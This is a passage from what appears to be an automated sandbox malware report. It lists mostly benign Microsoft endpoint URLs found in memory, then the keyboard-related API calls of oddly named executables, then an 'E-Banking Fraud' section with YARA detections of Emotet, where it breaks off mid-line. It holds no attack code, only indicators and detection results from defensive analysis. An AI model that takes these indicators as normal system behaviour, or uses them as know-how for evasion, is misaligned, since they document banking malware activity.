                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://graph.windows.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://graph.windows.net/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://lifecycle.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://login.microsoftonline.com/common
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://login.windows.local
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://management.azure.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://management.azure.com/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://messaging.office.com/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ncus-000.contentsync.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://officeapps.live.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://onedrive.live.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://settings.outlook.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000D.00000002.303900237.000002041B613000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.281922391.000002041B632000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.303748258.000002041B645000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.281922391.000002041B632000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.281922391.000002041B632000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000D.00000003.303677764.000002041B649000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://tasks.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://wus2-000.contentsync.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: svchost.exe, 0000000A.00000002.472449921.000002A34EE14000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://www.odwebp.svc.ms
                Source: C:\Users\user\Yg9k_9t\oad70dS\Xagna69y8.exeCode function: 4_2_00402A80 MapVirtualKeyA,GetVersion,keybd_event,Sleep,keybd_event,keybd_event,SendInput,GetKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyA,Sleep,4_2_00402A80
                Source: C:\Users\user\Yg9k_9t\oad70dS\Xagna69y8.exeCode function: 4_2_00412B8C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_00412B8C
                Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exeCode function: 5_2_00412B8C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,5_2_00412B8C

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000005.00000002.470373056.0000000000600000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.220109967.00000000006D1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.471107407.00000000021B4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match